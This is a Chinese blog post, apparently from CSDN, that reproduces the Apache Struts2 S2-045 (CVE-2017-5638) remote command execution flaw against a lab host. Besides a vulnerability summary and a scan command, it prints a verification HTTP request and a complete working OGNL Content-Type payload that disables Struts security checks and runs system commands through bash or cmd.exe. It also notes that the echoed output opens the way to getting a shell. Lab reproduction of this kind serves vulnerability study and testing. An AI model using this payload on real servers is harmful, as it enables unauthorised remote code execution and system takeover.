struts2_2.3.5反序列化漏洞复现

最新推荐文章于 2024-04-18 11:01:00 发布
最新推荐文章于 2024-04-18 11:01:00 发布
阅读量65 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: struts 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acdcccc/article/details/132701082
版权

struts_2.3.5_unserialize_CVE-2017-5638

说明内容
漏洞编号S2-045
CVE-2017-5638
漏洞名称struts_2.3.5_unserialize
漏洞评级高危
影响范围Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10
漏洞描述在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。
修复方案升级
打补丁
上设备

漏洞描述

Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。

恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

Struts2框架存在多个远程代码执行(S2-005、S2-009、S2-013、S2-016、S2-019、S2-020、S2-037、devmode),恶意攻击者可利用漏洞直接获取应用系统的Webshell,甚至获取操作系统以及数据库的权限。

漏洞等级

高危

影响版本

  • Struts 2.3.5 - Struts 2.3.31
  • Struts 2.5 - Struts 2.5.10

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
Struts2.3.5

漏洞扫描

使用nacs进行扫描

sudo ./nacs -h 192.168.117.163 -pa 8090

在这里插入图片描述

漏洞验证

  1. 构造request数据包

    POST / HTTP/1.1

Host: 192.168.117.163:8090

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: zbx_sessionid=49238ed3d29ae14f3a4d158dfa8c26cf; ADMINCONSOLESESSION=0SvVk3LQ3j5nxTC5CnGJnMLGrzhmhLLW2Lnj1SqsWp2fllTs7QMD!890617266

Connection: close

Content-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

Content-Length: 0

    在这里插入图片描述

深度利用

命令执行

  1. 构造POC

    Content-Type:  %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  2. 命令执行成功

    在这里插入图片描述

    因为有回显,后续就可以进行get shell

漏洞挖掘

网络测绘

struts2

修复建议

cwangc000
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
(s2-048)Struts2 序列漏洞
weixin_45253622的博客
12-14 1178
Struts2 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。 漏洞
01虚拟机安装操作(1),2024年网络安全笔试题总结
m0_60452141的博客
04-07 242
2.添加linux的iso镜像文件3.开启虚拟机, 进行安装。
Boosting在差分隐私上的应用(2),网络安全开发两年
2401_83946402的博客
04-15 681
简单叙述一下这个算法,它有T轮迭代,在每一轮当中,我们根据分布DtDt​选出来k个query,然后送到bsg(base synopsis generator)里面,bsg返回对于所有query的回答。2. 我们对于bsg给出的回答做个评判,然后分别打个分,越准确的回答,对应系数atqa_{t,q}at,q​约大。3. 归一打分,把它作为一个分布更新。T轮之后,我们得到了T∣Q∣T|Q|T∣Q∣个结果,对于每个query选一个好的回答,返回。
Struts2序列漏洞_strust2序列(1),最新网络安全面试题整理
最新发布
2301_82243078的博客
04-18 422
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~Gangster Name输入 ${233*233} , 其余随便填。将Gangster Name输入一下payload , 其余随便填。启动漏洞环境 docker-compose up -d。浏览器访问 showcase。还有大家最喜欢的黑客技术。
java struts2 漏洞合集
whatday的专栏
08-31 3576
目录 一、S2-001 二、S2-005 三、S2-007 四、S2-008 五、S2-009 六、S2-012 七、S2-013 八、S2-015 九、S2-016 十、S2-045 十一、S2-048 十二、S2-052 十三、S2-053 十四、S2-057 十五、S2-019 十六、S2-devMode Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
Strtus2历史漏洞
懂进攻知防守
07-26 853
S2-015(CVE-2013-2135)原理:如果一个请求与任何其他定义的操作不匹配,它将被匹配*,并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修验证等
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
Java序列漏洞利用工具.zip
04-10
java序列漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
信息安全_Android序列漏洞分析.2.pptx
08-14
主要内容 Android 序列介绍 Android 序列漏洞 CVE-2014-7911分析及漏洞利用细节 CVE-2015-3825分析及漏洞利用细节
Shiro序列漏洞检测工具
01-05
Shiro1.2.4及以下版本存在序列漏洞,该工具用于测试该漏洞
structs2最新远程执行漏洞S2-057、序列漏洞等修方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修方案
struts2.3.35漏洞升级全部JAR包
06-27
struts漏洞升级全部JAR包,struts2从2.3.15.1升级到2.3.35相关配置说明,在附件中包含有2.3.15.1版本的jar包和2.3.35版本的jar包
struts2.0-struts2.3 版本漏洞婉转解决办法
追求卓越,成功就在不经意间追上你
03-23 1531
近期Struts2被曝重要漏洞,此漏洞影响struts2.0-struts2.3所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商、银行、门户、政府居多. 官方描述: S2-016:https://cwiki.apache.org/confluence/display/WW/S2-016 S2-017:https://cwiki.apache.org/c
Struts2 2.2 和 2.3 版本最新漏洞及攻击方法和防范教程
weixin_33853794的博客
03-13 450
2019独角兽企业重金招聘Python工程师标准>>> ...
Struts2序列漏洞
wsnbbz的博客
03-04 2865
介绍 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互 漏洞环境 vulhub/struts2/s2-048 漏洞 1.ubuntu选择vulhub-master/struts2/s2-048目录,输入docker-compose up -d启动环...
struts2序列漏洞
cxrpty的博客
03-02 2917
Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 实验环境:vulhub中的struts 实验步骤: 可利用struts2扫描工具扫描是否有该漏洞,输入python3Struts2Scan.py -u http://192.168.1.103...
漏洞篇——Struts2序列漏洞
爱国小白帽
03-03 3852
Struts2是什么? Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序 这套 Struts2 入门教程对 Struts2 框架进行了讲解,采用基础知识与案例相结...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8242
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
struts2序列漏洞
10-16
struts2序列漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意的序列数据来执行任意代码。漏洞需要搭建一个漏洞环境,具体步骤如下: 1. 下载Struts2漏洞环境,例如:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值